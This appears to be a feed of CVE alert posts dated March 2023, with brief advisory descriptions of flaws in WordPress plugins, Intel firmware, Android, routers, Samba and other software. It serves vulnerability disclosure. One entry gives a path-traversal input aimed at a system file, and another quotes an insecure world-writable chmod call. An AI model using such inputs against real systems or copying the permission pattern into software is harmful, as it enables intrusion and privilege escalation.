🚨 CVE-2022-3854A flaw was found in Ceph, relating to the URL processing on RGW backends. An attacker can exploit the URL processing by providing a null URL to crash the RGW, causing a denial of service.🎖@cveNotify |
|
| 2023-03-07 02:30:27 |
🚨 CVE-2022-3857A flaw was found in libpng 1.6.38. A crafted PNG image can lead to a segmentation fault and denial of service in png_setup_paeth_row() function.🎖@cveNotify |
|
| 2023-03-07 02:30:26 |
🚨 CVE-2022-45141Since the Windows Kerberos RC4-HMAC Elevation of Privilege Vulnerability was disclosed by Microsoft on Nov 8 2022 and per RFC8429 it is assumed that rc4-hmac is weak, Vulnerable Samba Active Directory DCs will issue rc4-hmac encrypted tickets despite the target server supporting better encryption (eg aes256-cts-hmac-sha1-96).🎖@cveNotify |
|
| 2023-03-07 02:30:24 |
🚨 CVE-2022-45142The fix for CVE-2022-3437 included changing memcmp to be constant time and a workaround for a compiler bug by adding "!= 0" comparisons to the result of memcmp. When these patches were backported to the heimdal-7.7.1 and heimdal-7.8.0 branches (and possibly other branches) a logic inversion sneaked in causing the validation of message integrity codes in gssapi/arcfour to be inverted.🎖@cveNotify |
|
| 2023-03-07 02:30:22 |
🚨 CVE-2022-4134A flaw was found in openstack-glance. This issue could allow a remote, authenticated attacker to tamper with images, compromising the integrity of virtual machines created using these modified images.🎖@cveNotify |
|
| 2023-03-07 02:30:20 |
🚨 CVE-2022-4904A flaw was found in the c-ares package. The ares_set_sortlist is missing checks about the validity of the input string, which allows a possible arbitrary length stack overflow. This issue may cause a denial of service or a limited impact on confidentiality and integrity.🎖@cveNotify |
|
| 2023-03-07 02:30:15 |
🚨 CVE-2023-0330A vulnerability in the lsi53c895a device affects the latest version of qemu. A DMA-MMIO reentrancy problem may lead to memory corruption bugs like stack overflow or use-after-free.🎖@cveNotify |
|
| 2023-03-07 02:30:11 |
🚨 CVE-2023-27891rami.io pretix before 4.17.1 allows OAuth application authorization from a logged-out session. The fixed versions are 4.15.1, 4.16.1, and 4.17.1.🎖@cveNotify |
|
| 2023-03-06 22:30:02 |
🚨 CVE-2023-23939Azure/setup-kubectl is a GitHub Action for installing Kubectl. This vulnerability only impacts versions before version 3. An insecure temporary creation of a file allows other actors on the Actions runner to replace the Kubectl binary created by this action because it is world writable. This Kubectl tool installer runs `fs.chmodSync(kubectlPath, 777)` to set permissions on the Kubectl binary, however, this allows any local user to replace the Kubectl binary. This allows privilege escalation to the user that can also run kubectl, most likely root. This attack is only possible if an attacker somehow breached the GitHub actions runner or if a user is utilizing an Action that maliciously executes this attack. This has been fixed and released in all versions `v3` and later. 775 permissions are used instead. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-03-06 22:30:00 |
🚨 CVE-2023-26054BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. In affected versions when the user sends a build request that contains a Git URL that contains credentials and the build creates a provenance attestation describing that build, these credentials could be visible from the provenance attestation. Git URL can be passed in two ways: 1) Invoking build directly from a URL with credentials. 2) If the client sends additional version control system (VCS) info hint parameters on builds from a local source. Usually, that would mean reading the origin URL from `.git/config` file. When a build is performed under specific conditions where credentials were passed to BuildKit they may be visible to everyone who has access to provenance attestation. Provenance attestations and VCS info hints were added in version v0.11.0. Previous versions are not vulnerable. In v0.10, when building directly from Git URL, the same URL could be visible in `BuildInfo` structure that is a predecessor of Provenance attestations. Previous versions are not vulnerable. This bug has been fixed in v0.11.4. Users are advised to upgrade. Users unable to upgrade may disable VCS info hints by setting `BUILDX_GIT_INFO=0`. `buildctl` does not set VCS hints based on `.git` directory, and values would need to be passed manually with `--opt`.🎖@cveNotify |
|
| 2023-03-06 22:29:59 |
🚨 CVE-2023-27472quickentity-editor-next is an open source, system local, video game asset editor. In affected versions HTML tags in entity names are not sanitised (XSS vulnerability). Allows arbitrary code execution within the browser sandbox, among other things, simply from loading a file containing a script tag in any entity name. This issue has been patched in version 1.28.1 of the application. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-03-06 22:29:58 |
🚨 CVE-2023-1026The WP Meta SEO plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the listPostsCategory function in versions up to, and including, 4.5.3. This makes it possible for authenticated attackers with subscriber-level access to get post listings by category as long as those posts are published. This vulnerability occurred as a result of the plugin relying on nonce checks as a means of access control, and that nonce being accessible to all authenticated users regardless of role.🎖@cveNotify |
|
| 2023-03-06 22:29:57 |
🚨 CVE-2023-1027The WP Meta SEO plugin for WordPress is vulnerable to unauthorized sitemap generation due to a missing capability check on the checkAllCategoryInSitemap function in versions up to, and including, 4.5.3. This makes it possible for authenticated attackers with subscriber-level access to obtain post categories. This vulnerability occurred as a result of the plugin relying on nonce checks as a means of access control, and that nonce being accessible to all authenticated users regardless of role.🎖@cveNotify |
|
| 2023-03-06 22:29:56 |
🚨 CVE-2022-32570Improper authentication in the Intel(R) Quartus Prime Pro and Standard edition software may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-03-06 22:29:54 |
🚨 CVE-2022-36348Active debug code in some Intel (R) SPS firmware before version SPS_E5_04.04.04.300.0 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-03-06 22:29:53 |
🚨 CVE-2022-36794Improper condition check in some Intel(R) SPS firmware before version SPS_E3_06.00.03.300.0 may allow a privileged user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-03-06 22:29:52 |
🚨 CVE-2023-1028The WP Meta SEO plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.5.3. This is due to missing or incorrect nonce validation on the setIgnore function. This makes it possible for unauthenticated attackers to update plugin options via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-03-06 22:29:51 |
🚨 CVE-2023-25431An issue was discovered in Online Reviewer Management System v1.0. There is a XSS vulnerability via reviewer_0/admins/assessments/course/course-update.php.🎖@cveNotify |
|
| 2023-03-06 22:29:48 |
🚨 CVE-2022-37329Uncontrolled search path in some Intel(R) Quartus(R) Prime Pro and Standard Edition software may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-03-06 22:29:47 |
🚨 CVE-2023-25432An issue was discovered in Online Reviewer Management System v1.0. There is a SQL injection that can directly issue instructions to the background database system via reviewer_0/admins/assessments/course/course-update.php.🎖@cveNotify |
|
| 2023-03-06 22:29:46 |
🚨 CVE-2022-21163Improper access control in the Crypto API Toolkit for Intel(R) SGX before version 2.0 commit ID 91ee496 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-03-06 22:29:44 |
🚨 CVE-2022-27808Insufficient control flow management in some Intel(R) Ethernet Controller Administrative Tools drivers for Windows before version 1.5.0.2 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-03-06 22:29:43 |
🚨 CVE-2023-20932In onCreatePreferences of EditInfoFragment.java, there is a possible way to read contacts belonging to other users due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-248251018🎖@cveNotify |
|
| 2023-03-06 22:29:42 |
🚨 CVE-2022-36397Incorrect default permissions in the software installer for some Intel(R) QAT drivers for Linux before version 4.17 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-03-06 22:29:40 |
🚨 CVE-2022-33972Incorrect calculation in microcode keying mechanism for some 3rd Generation Intel(R) Xeon(R) Scalable Processors may allow a privileged user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-03-06 22:29:39 |
🚨 CVE-2023-20933In several functions of MediaCodec.cpp, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-245860753🎖@cveNotify |
|
| 2023-03-06 22:29:38 |
🚨 CVE-2023-20934In resolveAttributionSource of ServiceUtilities.cpp, there is a possible way to disable the microphone privacy indicator due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12 Android-12L Android-13Android ID: A-258672042🎖@cveNotify |
|
| 2023-03-06 22:29:37 |
🚨 CVE-2023-20939In multiple functions of looper_backed_event_loop.cpp, there is a possible way to corrupt memory due to improper locking. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12 Android-12L Android-13Android ID: A-243362981🎖@cveNotify |
|
| 2023-03-06 20:30:03 |
🚨 CVE-2021-33224File upload vulnerability in Umbraco Forms v.8.7.0 allows unauthenticated attackers to execute arbitrary code via a crafted web.config and asp file.🎖@cveNotify |
|
| 2023-03-06 20:30:02 |
🚨 CVE-2023-25692Improper Input Validation vulnerability in the Apache Airflow Google Provider. This issue affects Apache Airflow Google Provider versions before 8.10.0.🎖@cveNotify |
|
| 2023-03-06 20:30:01 |
🚨 CVE-2022-34157Improper access control in the Intel(R) FPGA SDK for OpenCL(TM) with Intel(R) Quartus(R) Prime Pro Edition software before version 22.1 may allow authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-03-06 20:30:00 |
🚨 CVE-2023-25691Improper Input Validation vulnerability in the Apache Airflow Google Provider. This issue affects Apache Airflow Google Provider versions before 8.10.0.🎖@cveNotify |
|
| 2023-03-06 20:29:56 |
🚨 CVE-2023-25169discourse-yearly-review is a discourse plugin which publishes an automated Year in Review topic. In affected versions a user present in a yearly review topic that is then anonymised will still have some data linked to its original account. This issue has been patched in commit `b3ab33bbf7` which is included in the latest version of the Discourse Yearly Review plugin. Users are advised to upgrade. Users unable to upgrade may disable the `yearly_review_enabled` setting to fully mitigate the issue. Also, it's possible to edit the anonymised user's old data in the yearly review topics manually.🎖@cveNotify |
|
| 2023-03-06 20:29:55 |
🚨 CVE-2023-23296Korenix JetWave 4200 Series 1.3.0 and JetWave 3200 Series 1.6.0 are vulnerable to Denial of Service via /goform/formDefault.🎖@cveNotify |
|
| 2023-03-06 20:29:54 |
🚨 CVE-2023-1009A vulnerability classified as problematic has been found in DrayTek Vigor 2960 1.5.1.4. Affected is the function sub_1DF14 of the file /cgi-bin/mainfunction.cgi. The manipulation of the argument option with the input /../etc/password leads to path traversal. The attack needs to be done within the local network. The exploit has been disclosed to the public and may be used. VDB-221742 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-06 20:29:53 |
🚨 CVE-2022-46440ttftool v0.9.2 was discovered to contain a segmentation violation via the readU16 function at ttf.c.🎖@cveNotify |
|
| 2023-03-06 20:29:49 |
🚨 CVE-2022-35729Out of bounds read in firmware for OpenBMC in some Intel(R) platforms before version 0.72 may allow unauthenticated user to potentially enable denial of service via network access.🎖@cveNotify |
|
| 2023-03-06 20:29:48 |
🚨 CVE-2022-45697Arbitrary File Delete vulnerability in Razer Central before v7.8.0.381 when handling files in the Accounts directory.🎖@cveNotify |
|
| 2023-03-06 20:29:47 |
🚨 CVE-2022-30704Improper initialization in the Intel(R) TXT SINIT ACM for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-03-06 20:29:43 |
🚨 CVE-2022-32231Improper initialization in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-03-06 20:29:42 |
🚨 CVE-2022-34849Uncaught exception in the Intel(R) Iris(R) Xe MAX drivers for Windows before version 100.0.5.1436(v2) may allow a privileged user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-03-06 20:29:41 |
🚨 CVE-2022-26888Cross-site scripting in the Intel(R) Quartus Prime Pro and Standard edition software may allow an authenticated user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-03-06 20:29:40 |
🚨 CVE-2021-33104Improper access control in the Intel(R) OFU software before version 14.1.28 may allow an authenticated user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-03-06 17:29:43 |
🚨 CVE-2023-24124Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wrlEn parameter at /goform/WifiBasicSet.🎖@cveNotify |
|
| 2023-03-06 17:29:42 |
🚨 CVE-2023-24125Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey2_5g parameter at /goform/WifiBasicSet.🎖@cveNotify |
|
| 2023-03-06 17:29:41 |
🚨 CVE-2023-24122Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the ssid_5g parameter at /goform/WifiBasicSet.🎖@cveNotify |
|
| 2023-03-06 17:29:40 |
🚨 CVE-2023-24123Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepauth parameter at /goform/WifiBasicSet.🎖@cveNotify |
|
| 2023-03-06 15:30:08 |
🚨 CVE-2022-4265The Replyable WordPress plugin before 2.2.10 does not validate the class name submitted by the request when instantiating an object in the prompt_dismiss_notice action and also lacks CSRF check in the related action. This could allow any authenticated users, such as subscriber to perform Object Injection attacks. The attack could also be done via a CSRF vector against any authenticated user🎖@cveNotify |
|
| 2023-03-06 15:30:07 |
🚨 CVE-2022-4328The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server🎖@cveNotify |
|
| 2023-03-06 15:30:06 |
🚨 CVE-2023-0063The WordPress Shortcodes WordPress plugin through 1.6.36 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-03-06 15:30:05 |
🚨 CVE-2023-0064The eVision Responsive Column Layout Shortcodes WordPress plugin through 2.3 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-03-06 15:30:04 |
🚨 CVE-2023-0065The i2 Pros & Cons WordPress plugin through 1.3.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-03-06 15:30:00 |
🚨 CVE-2023-0068The Product GTIN (EAN, UPC, ISBN) for WooCommerce WordPress plugin through 1.1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-03-06 15:29:59 |
🚨 CVE-2023-0069The WPaudio MP3 Player WordPress plugin through 4.0.2 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-03-06 15:29:58 |
🚨 CVE-2023-0076The Download Attachments WordPress plugin through 1.2.24 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-03-06 15:29:57 |
🚨 CVE-2023-0078The Resume Builder WordPress plugin through 3.1.1 does not sanitize and escape some parameters related to Resume, which could allow users with a role as low as subscriber to perform Stored XSS attacks against higher privilege users🎖@cveNotify |
|
| 2023-03-06 15:29:56 |
🚨 CVE-2023-0165The Cost Calculator WordPress plugin through 1.8 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-03-06 15:29:52 |
🚨 CVE-2023-0212The Advanced Recent Posts WordPress plugin through 0.6.14 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-03-06 15:29:51 |
🚨 CVE-2023-0328The WPCode WordPress plugin before 2.0.7 does not have adequate privilege checks in place for several AJAX actions, only checking the nonce. This may lead to allowing any authenticated user who can edit posts to call the endpoints related to WPCode Library authentication (such as update and delete the auth key).🎖@cveNotify |
|
| 2023-03-06 15:29:50 |
🚨 CVE-2022-32764Description: Race condition in the Intel(R) DSA software before version 22.4.26 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-03-06 15:29:49 |
🚨 CVE-2023-0034The JetWidgets For Elementor WordPress plugin before 1.0.14 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-03-06 15:29:44 |
🚨 CVE-2019-14372In Libav 12.3, there is an infinite loop in the function wv_read_block_header() in the file wvdec.c.🎖@cveNotify |
|
| 2023-03-06 15:29:43 |
🚨 CVE-2017-20180A vulnerability classified as critical has been found in Zerocoin libzerocoin. Affected is the function CoinSpend::CoinSpend of the file CoinSpend.cpp of the component Proof Handler. The manipulation leads to insufficient verification of data authenticity. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The name of the patch is ce103a09ec079d0a0ed95475992348bed6e860de. It is recommended to apply a patch to fix this issue. VDB-222318 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-06 15:29:42 |
🚨 CVE-2022-3284Download key for a file in a vault was passed in an insecure way that could easily be logged in M-Files New Web in M-Files before 22.11.12011.0. This issue affects M-Files New Web: before 22.11.12011.0.🎖@cveNotify |
|
| 2023-03-06 15:29:41 |
🚨 CVE-2022-4862Rendering of HTML provided by another authenticated user is possible in browser on M-Files Web before 22.12.12140.3. This allows the content to steal user sensitive information. This issue affects M-Files New Web: before 22.12.12140.3.🎖@cveNotify |
|
| 2023-03-06 14:29:37 |
🚨 CVE-2022-2178Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Saysis Computer Starcities. This issue affects Starcities: before 1.1.🎖@cveNotify |
|
| 2023-03-06 14:29:36 |
🚨 CVE-2022-3284Download key for a file in a vault was passed in an insecure way that could easily be logged in M-Files New Web in M-Files before 22.11.12011.0. This issue affects M-Files New Web: before 22.11.12011.0.🎖@cveNotify |
|
| 2023-03-06 14:29:35 |
🚨 CVE-2022-4862Rendering of HTML provided by another authenticated user is possible in browser on M-Files Web before 22.12.12140.3. This allows the content to steal user sensitive information. This issue affects M-Files New Web: before 22.12.12140.3.🎖@cveNotify |
|
| 2023-03-06 12:29:53 |
🚨 CVE-2023-0839Improper Protection for Outbound Error Messages and Alert Signals vulnerability in ProMIS Process Co. InSCADA allows Account Footprinting.This issue affects inSCADA: before 20230115-1.🎖@cveNotify |
|
| 2023-03-06 12:29:52 |
🚨 CVE-2023-1184A vulnerability, which was classified as problematic, has been found in ECshop up to 4.1.8. Affected by this issue is some unknown functionality of the file admin/database.php of the component Backup Database Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222356.🎖@cveNotify |
|
| 2023-03-06 12:29:51 |
🚨 CVE-2023-1185A vulnerability, which was classified as problematic, was found in ECshop up to 4.1.8. This affects an unknown part of the component New Product Handler. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-222357 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-06 12:29:50 |
🚨 CVE-2023-1186A vulnerability has been found in FabulaTech Webcam for Remote Desktop 2.8.42 and classified as problematic. This vulnerability affects unknown code in the library ftwebcam.sys of the component IoControlCode Handler. The manipulation leads to null pointer dereference. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. VDB-222358 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-06 12:29:49 |
🚨 CVE-2023-1187A vulnerability was found in FabulaTech Webcam for Remote Desktop 2.8.42 and classified as problematic. This issue affects some unknown processing in the library ftwebcam.sys of the component Global Variable Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222359.🎖@cveNotify |
|
| 2023-03-06 12:29:47 |
🚨 CVE-2023-1188A vulnerability was found in FabulaTech Webcam for Remote Desktop 2.8.42. It has been classified as problematic. Affected is an unknown function in the library ftwebcam.sys of the component IoControlCode Handler. The manipulation leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222360.🎖@cveNotify |
|
| 2023-03-06 12:29:46 |
🚨 CVE-2023-1189A vulnerability was found in WiseCleaner Wise Folder Hider 4.4.3.202. It has been declared as problematic. Affected by this vulnerability is an unknown functionality in the library WiseFs64.sys of the component IoControlCode Handler. The manipulation leads to denial of service. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier VDB-222361 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-06 12:29:45 |
🚨 CVE-2023-1190A vulnerability was found in xiaozhuai imageinfo up to 3.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file imageinfo.hpp. The manipulation leads to buffer overflow. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. VDB-222362 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-06 12:29:43 |
🚨 CVE-2023-1191A vulnerability classified as problematic has been found in fastcms. This affects an unknown part of the file admin/TemplateController.java of the component ZIP File Handler. The manipulation leads to path traversal. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-222363.🎖@cveNotify |
|
| 2023-03-06 12:29:42 |
🚨 CVE-2015-10093A vulnerability was found in Mark User as Spammer Plugin 1.0.0/1.0.1. It has been declared as problematic. Affected by this vulnerability is the function user_row_actions of the file plugin/plugin.php. The manipulation of the argument url leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.0.2 is able to address this issue. The name of the patch is e7059727274d2767c240c55c02c163eaa4ba6c62. It is recommended to upgrade the affected component. The identifier VDB-222325 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-06 12:29:40 |
🚨 CVE-2023-22856A stored Cross-site Scripting (XSS) vulnerability in BlogEngine.NET 3.3.8.0, allows injection of arbitrary JavaScript in the security context of a blog visitor through an upload of a specially crafted file.🎖@cveNotify |
|
| 2023-03-06 12:29:39 |
🚨 CVE-2023-22857A stored Cross-site Scripting (XSS) vulnerability in BlogEngine.NET 3.3.8.0, allows injection of arbitrary JavaScript in the security context of a blog visitor through an injection of a malicious payload into a blog post.🎖@cveNotify |
|
| 2023-03-06 12:29:38 |
🚨 CVE-2023-22858An Improper Access Control vulnerability in BlogEngine.NET 3.3.8.0, allows unauthenticated visitors to access the files of unpublished blogs.🎖@cveNotify |
|
| 2023-03-06 12:29:36 |
🚨 CVE-2015-10092A vulnerability was found in Qtranslate Slug Plugin up to 1.1.16. It has been classified as problematic. Affected is the function add_slug_meta_box of the file includes/class-qtranslate-slug.php. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 1.1.17 is able to address this issue. The name of the patch is 74b3932696f9868e14563e51b7d0bb68c53bf5e4. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-222324.🎖@cveNotify |
|
| 2023-03-06 06:29:51 |
🚨 CVE-2022-44875KioWare through 8.33 on Windows sets KioScriptingUrlACL.AclActions.AllowHigh for the about:blank origin, which allows attackers to obtain SYSTEM access via KioUtils.Execute in JavaScript code.🎖@cveNotify |
|
| 2023-03-06 06:29:47 |
🚨 CVE-2023-26106All versions of the package dot-lens are vulnerable to Prototype Pollution via the set() function in index.js file.🎖@cveNotify |
|
| 2023-03-06 06:29:46 |
🚨 CVE-2023-26107All versions of the package sketchsvg are vulnerable to Arbitrary Code Injection when invoking shell.exec without sanitization nor parametrization while concatenating the current directory as part of the command string.🎖@cveNotify |
|
| 2023-03-06 06:29:45 |
🚨 CVE-2023-26108Versions of the package @nestjs/core before 9.0.5 are vulnerable to Information Exposure via the StreamableFile pipe. Exploiting this vulnerability is possible when the client cancels a request while it is streaming a StreamableFile, the stream wrapped by the StreamableFile will be kept open.🎖@cveNotify |
|
| 2023-03-06 06:29:44 |
🚨 CVE-2023-23313Certain Draytek products are vulnerable to Cross Site Scripting (XSS) via the wlogin.cgi script and user_login.cgi script of the router's web application management portal. This affects Vigor3910, Vigor1000B, Vigor2962 v4.3.2.1; Vigor2865 and Vigor2866 v4.4.1.0; Vigor2927 v4.4.2.2; and Vigor2915, Vigor2765, Vigor2766, Vigor2135 v4.4.2.0; Vigor2763 v4.4.2.1; Vigor2862 and Vigor2926 v3.9.9.0; Vigor2925 v3.9.3; Vigor2952 and Vigor3220 v3.9.7.3; Vigor2133 and Vigor2762 v3.9.6.4; and Vigor2832 v3.9.6.2.🎖@cveNotify |
|
| 2023-03-06 06:29:40 |
🚨 CVE-2023-27560Math/PrimeField.php in phpseclib 3.x before 3.0.19 has an infinite loop with composite primefields.🎖@cveNotify |
|
| 2023-03-06 06:29:39 |
🚨 CVE-2021-32852Countly, a product analytics solution, is vulnerable to cross-site scripting prior to version 21.11 of the community edition. The victim must follow a malicious link or be redirected there from malicious web site. The attacker must have an account or be able to create one. This issue is patched in version 21.11.🎖@cveNotify |
|
| 2023-03-06 06:29:38 |
🚨 CVE-2022-4928A vulnerability was found in icplayer up to 0.819. It has been declared as problematic. Affected by this vulnerability is the function AddonText_Selection_create of the file addons/Text_Selection/src/presenter.js. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 0.820 is able to address this issue. The name of the patch is 2223628e6db1df73f6d633d2c0422d995990f0a3. It is recommended to upgrade the affected component. The identifier VDB-222289 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-06 06:29:37 |
🚨 CVE-2022-4929A vulnerability was found in icplayer up to 0.818. It has been rated as problematic. Affected by this issue is some unknown functionality of the file addons/Commons/src/tts-utils.js. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 0.819 is able to address this issue. The name of the patch is fa785969f213c76384f1fe67d47b17d57fcc60c8. It is recommended to upgrade the affected component. VDB-222290 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-06 06:29:36 |
🚨 CVE-2015-10091A vulnerability has been found in ByWater Solutions bywater-koha-xslt and classified as critical. This vulnerability affects the function StringSearch of the file admin/systempreferences.pl. The manipulation of the argument name leads to sql injection. The attack can be initiated remotely. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The name of the patch is 9513b93c828dfbc4413f9e0df63647401aaf4e58. It is recommended to apply a patch to fix this issue. VDB-222322 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-06 02:29:46 |
🚨 CVE-2015-10090A vulnerability, which was classified as problematic, has been found in Landing Pages Plugin up to 1.8.7. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 1.8.8 is able to address this issue. The name of the patch is c8e22c1340c11fedfb0a0a67ea690421bdb62b94. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-222320.🎖@cveNotify |
|
| 2023-03-06 02:29:42 |
🚨 CVE-2023-22336Path traversal vulnerability in SS1 Ver.13.0.0.40 and earlier and Rakuraku PC Cloud Agent Ver.2.1.8 and earlier allows a remote attacker to upload a specially crafted file to an arbitrary directory. As a result of exploiting this vulnerability with CVE-2023-22335 and CVE-2023-22344 vulnerabilities together, it may allow a remote attacker to execute an arbitrary code with SYSTEM privileges by sending a specially crafted script to the affected device.🎖@cveNotify |
|
| 2023-03-06 02:29:41 |
🚨 CVE-2023-22419Out-of-bounds read vulnerability exists in Kostac PLC Programming Software (Former name: Koyo PLC Programming Software) Version 1.6.9.0 and earlier. When processing a comment block in stage information, the end of data cannot be verified and out-of-bounds read occurs. As a result, opening a specially crafted project file may lead to information disclosure and/or arbitrary code execution.🎖@cveNotify |
|
| 2023-03-06 02:29:40 |
🚨 CVE-2023-22421Out-of-bounds read vulnerability exists in Kostac PLC Programming Software (Former name: Koyo PLC Programming Software) Version 1.6.9.0 and earlier. The insufficient buffer size for the PLC program instructions leads to out-of-bounds read. As a result, opening a specially crafted project file may lead to information disclosure and/or arbitrary code execution.🎖@cveNotify |
|
| 2023-03-06 02:29:37 |
🚨 CVE-2023-22424Use-after-free vulnerability exists in Kostac PLC Programming Software (Former name: Koyo PLC Programming Software) Version 1.6.9.0 and earlier. With the abnormal value given as the maximum number of columns for the PLC program, the process accesses the freed memory. As a result, opening a specially crafted project file may lead to information disclosure and/or arbitrary code execution.🎖@cveNotify |
|
| 2023-03-06 02:29:36 |
🚨 CVE-2023-22438Cross-site scripting vulnerability in Contents Management of EC-CUBE 4 series (EC-CUBE 4.0.0 to 4.0.6-p2, EC-CUBE 4.1.0 to 4.1.2-p1, and EC-CUBE 4.2.0), EC-CUBE 3 series (EC-CUBE 3.0.0 to 3.0.18-p5), and EC-CUBE 2 series (EC-CUBE 2.11.0 to 2.11.5, EC-CUBE 2.12.0 to 2.12.6, EC-CUBE 2.13.0 to 2.13.5, and EC-CUBE 2.17.0 to 2.17.2) allows a remote authenticated attacker to inject an arbitrary script.🎖@cveNotify |
|
| 2023-03-06 02:29:35 |
🚨 CVE-2023-25077Cross-site scripting vulnerability in Authentication Key Settings of EC-CUBE 4.0.0 to 4.0.6-p2, EC-CUBE 4.1.0 to 4.1.2-p1, and EC-CUBE 4.2.0 allows a remote authenticated attacker to inject an arbitrary script.🎖@cveNotify |
|
| 2023-03-06 00:29:41 |
